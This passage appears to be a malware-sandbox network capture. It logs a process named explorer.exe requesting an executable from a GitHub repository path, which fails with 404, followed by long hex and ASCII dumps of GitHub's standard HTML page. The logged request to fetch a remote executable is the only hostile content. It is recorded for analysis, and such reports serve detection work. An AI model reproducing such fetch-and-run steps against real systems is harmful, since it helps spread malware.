                                                                                                                Connection: close
                                                                                                                x-powered-by: PHP/7.2.34
                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                content-length: 0
                                                                                                                date: Thu, 13 Oct 2022 11:08:08 GMT
                                                                                                                server: LiteSpeed
                                                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                5192.168.2.549728140.82.121.3443C:\Windows\explorer.exe
                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                2022-10-13 11:08:11 UTC3876OUTGET /testermanmag/myownre/raw/main/explorer.exe HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Host: github.com
                                                                                                                2022-10-13 11:08:11 UTC3876INHTTP/1.1 404 Not Found
                                                                                                                Server: GitHub.com
                                                                                                                Date: Thu, 13 Oct 2022 11:08:05 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                Cache-Control: no-cache
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                X-Frame-Options: deny
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 0
                                                                                                                Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                2022-10-13 11:08:11 UTC3877INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                                                2022-10-13 11:08:11 UTC3879INData Raw: 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b
                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link
                                                                                                                2022-10-13 11:08:11 UTC3879INData Raw: 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 0a 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67
                                                                                                                Data Ascii: ubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.g
                                                                                                                2022-10-13 11:08:11 UTC3880INData Raw: 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 2d 63 64 64 38 38 66 31 34 36 62 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65
                                                                                                                Data Ascii: _tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-cdd88f146bf7.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-hre
                                                                                                                2022-10-13 11:08:11 UTC3882INData Raw: 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6e 76 69 72 6f 6e 6d 65 6e 74 2d 30 31 39 61 64 38 61 61 65 61 62 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e
                                                                                                                Data Ascii: <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-019ad8aaeab3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.
                                                                                                                2022-10-13 11:08:11 UTC3883INData Raw: 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 65 2d 61 74 74 61 63 68 6d 65 6e 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 74 65 72 2d 2d 36 61 35 62 66 66 2d 39 33 65 64 64 31 38 64 61 62 31 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69
                                                                                                                Data Ascii: avascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_filter--6a5bff-93edd18dab1d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascri
                                                                                                                2022-10-13 11:08:11 UTC3885INData Raw: 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 65 6d 6f 69 7a 65 5f 64 69 73 74 5f 65 73 6d 5f 69 2d 66 61 62 37 37 63 2d 66 66 39 64 39 66 64 65 36 62 63 36 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e
                                                                                                                Data Ascii: node_modules_github_memoize_dist_esm_i-fab77c-ff9d9fde6bc6.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-n
                                                                                                                2022-10-13 11:08:11 UTC3886INData Raw: 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 30 32 62 33 38 32 36 30 64 38 35 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 62 61 74 63 68 2d 64 65 66 65
                                                                                                                Data Ascii: menting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-02b38260d85d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_batch-defe
                                                                                                                2022-10-13 11:08:11 UTC3887INData Raw: 44 59 34 4d 7a 67 31 4e 6a 67 31 49 69 77 69 63 6d 56 6e 61 57 39 75 58 32 56 6b 5a 32 55 69 4f 69 4a 6d 63 6d 45 69 4c 43 4a 79 5a 57 64 70 62 32 35 66 63 6d 56 75 5a 47 56 79 49 6a 6f 69 61 57 46 6b 49 6e 30 3d 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 73 69 74 6f 72 2d 68 6d 61 63 22 20 63 6f 6e 74 65 6e 74 3d 22 30 66 35 34 63 61 62 38 33 36 36 63 39 36 34 38 33 39 64 31 61 30 36 31 33 62 61 30 34 63 37 38 65 61 36 36 65 65 38 63 39 64 38 32 66 63 65 63 35 64 62 37 36 62 62 32 63 65 37 61 66 30 39 61 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0a 0a 0a 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 69 74
                                                                                                                Data Ascii: DY4Mzg1Njg1IiwicmVnaW9uX2VkZ2UiOiJmcmEiLCJyZWdpb25fcmVuZGVyIjoiaWFkIn0=" data-turbo-transient="true" /><meta name="visitor-hmac" content="0f54cab8366c964839d1a0613ba04c78ea66ee8c9d82fcec5db76bb2ce7af09a" data-turbo-transient="true" /> <meta name="git
                                                                                                                2022-10-13 11:08:11 UTC3889INData Raw: 65 66 3d 22 2f 6f 70 65 6e 73 65 61 72 63 68 2e 78 6d 6c 22 20 74 69 74 6c 65 3d 22 47 69 74 48 75 62 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 66 6c 75 69 64 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 6c 75 69 64 69 63 6f 6e 2e 70 6e 67 22 20 74 69 74 6c 65 3d 22 47 69 74 48 75 62 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 70 70 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 34 30 31 34 38 38 36 39 33 34 33 36 35 32 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 31 34 37 37 33 37 36 39 30 35 22 20 2f 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61
                                                                                                                Data Ascii: ef="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta
                                                                                                                2022-10-13 11:08:11 UTC3890INData Raw: 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 77 69 64 74 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 32 30 30 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 68 65 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 36 32 30 22 3e 0a 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 67 69 74 68 75 62 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 3a 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 33 33 33 34 37 36 32 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 63 72 65 61
                                                                                                                Data Ascii: <meta property="og:image:width" content="1200"> <meta property="og:image:height" content="620"> <meta property="twitter:site" content="github"> <meta property="twitter:site:id" content="13334762"> <meta property="twitter:crea
                                                                                                                2022-10-13 11:08:11 UTC3891INData Raw: 62 35 35 31 33 65 39 32 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 63 6b 3d 22 72 65 6c 6f 61 64 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 70 6a 61 78 2d 63 73 70 2d 76 65 72 73 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 66 62 39 35 62 63 39 61 31 32 34 62 36 62 36 64 38 61 32 65 30 30 34 31 35 32 66 39 39 65 33 30 39 38 38 64 63 38 33 39 32 39 61 35 63 39 64 36 63 63 36 33 34 31 63 65 33 34 38 39 30 39 66 33 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 63 6b 3d 22 72 65 6c 6f 61 64 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 70 6a 61 78 2d 63 73 73 2d 76 65 72 73 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 61 33 33 65 33 62 36 35 38 36 33 62 30 36 61 38 34 35 32 34 64 61 39 63 61 36
                                                                                                                Data Ascii: b5513e92" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="fb95bc9a124b6b6d8a2e004152f99e30988dc83929a5c9d6cc6341ce348909f3" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="da33e3b65863b06a84524da9ca6
                                                                                                                2022-10-13 11:08:11 UTC3893INData Raw: 3d 22 61 6c 74 65 72 6e 61 74 65 20 69 63 6f 6e 22 20 63 6c 61 73 73 3d 22 6a 73 2d 73 69 74 65 2d 66 61 76 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 63 6c 61 73 73 3d 22 6a 73 2d 73 69 74 65 2d 66 61 76 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 73 76 67 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d
                                                                                                                Data Ascii: ="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"><meta nam
                                                                                                                2022-10-13 11:08:11 UTC3894INData Raw: 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 73 65 73 73 69 6f 6e 73 2d 32 33 39 36 37 35 35 36 36 66 37 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 2d 6f 6c 64 20 68 65 61 64 65 72 2d 6c 6f 67 67 65 64 2d 6f 75 74 20 6a 73 2d 64 65 74 61 69 6c 73 2d 63 6f 6e 74 61 69 6e 65 72 20 44 65 74 61 69 6c 73 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 66 34 20 70 79 2d 33 22 20 72 6f 6c 65 3d 22 62 61 6e 6e 65 72 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 2d 62 61 63
                                                                                                                Data Ascii: cation/javascript" src="https://github.githubassets.com/assets/sessions-239675566f74.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-bac
                                                                                                                2022-10-13 11:08:11 UTC3895INData Raw: 37 2e 36 38 20 30 20 31 2e 33 36 2e 30 39 20 32 20 2e 32 37 20 31 2e 35 33 2d 31 2e 30 34 20 32 2e 32 2d 2e 38 32 20 32 2e 32 2d 2e 38 32 2e 34 34 20 31 2e 31 2e 31 36 20 31 2e 39 32 2e 30 38 20 32 2e 31 32 2e 35 31 2e 35 36 2e 38 32 20 31 2e 32 37 2e 38 32 20 32 2e 31 35 20 30 20 33 2e 30 37 2d 31 2e 38 37 20 33 2e 37 35 2d 33 2e 36 35 20 33 2e 39 35 2e 32 39 2e 32 35 2e 35 34 2e 37 33 2e 35 34 20 31 2e 34 38 20 30 20 31 2e 30 37 2d 2e 30 31 20 31 2e 39 33 2d 2e 30 31 20 32 2e 32 20 30 20 2e 32 31 2e 31 35 2e 34 36 2e 35 35 2e 33 38 41 38 2e 30 31 33 20 38 2e 30 31 33 20 30 20 30 30 31 36 20 38 63 30 2d 34 2e 34 32 2d 33 2e 35 38 2d 38 2d 38 2d 38 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 2f 61 3e 0a 0a 20 20 20 20 20 20
                                                                                                                Data Ascii: 7.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> </a>
                                                                                                                2022-10-13 11:08:11 UTC3897INData Raw: 75 74 74 6f 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 42 75 74 74 6f 6e 2d 6c 61 62 65 6c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 74 6f 67 67 6c 65 2d 62 61 72 20 72 6f 75 6e 64 65 64 20 6d 79 2d 31 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 74 6f 67 67 6c 65 2d 62 61 72 20 72 6f 75 6e 64 65 64 20 6d 79 2d 31 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 74 6f 67 67 6c 65 2d 62 61 72 20 72 6f 75 6e 64 65 64 20 6d 79 2d 31 22 3e 3c 2f 64 69 76 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e
                                                                                                                Data Ascii: utton-content"> <span class="Button-label"><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span
                                                                                                                2022-10-13 11:08:11 UTC3898INData Raw: 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 30 31 30 20 31 2e 30 36 6c 2d 34 2e 32 35 20 34 2e 32 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 20 30 4c 33 2e 32 32 20 37 2e 32 38 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 2d 31 2e 30 36 4c 38 20 39 2e 39 34 6c 33 2e 37 32 2d 33 2e 37 32 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 20 30 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 20 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 72 6f 75 6e 64 65 64 20 6d 2d 30 20 70 2d 30 20 70 79 2d 32 20 70 79 2d 6c 67 2d 34 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 6f 73 69 74 69 6f 6e 2d
                                                                                                                Data Ascii: .22a.75.75 0 010 1.06l-4.25 4.25a.75.75 0 01-1.06 0L3.22 7.28a.75.75 0 011.06-1.06L8 9.94l3.72-3.72a.75.75 0 011.06 0z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-
                                                                                                                2022-10-13 11:08:11 UTC3899INData Raw: 30 2e 35 2e 35 48 32 31 61 2e 35 2e 35 20 30 20 30 30 2e 35 2d 2e 35 76 2d 36 2e 35 61 2e 35 2e 35 20 30 20 30 30 2d 2e 35 2d 2e 35 68 2d 36 2e 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 68 34 22 3e 41 63 74 69 6f 6e 73 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 41 75 74 6f 6d 61 74 65 20 61 6e 79 20 77 6f 72 6b 66 6c 6f 77 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64
                                                                                                                Data Ascii: 0.5.5H21a.5.5 0 00.5-.5v-6.5a.5.5 0 00-.5-.5h-6.5z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div> </a></li> <li> <a class="HeaderMenu-dropdown-link lh-cond
                                                                                                                2022-10-13 11:08:11 UTC3901INData Raw: 65 20 70 61 63 6b 61 67 65 73 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 70 62 2d 6c 67 2d 33 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61
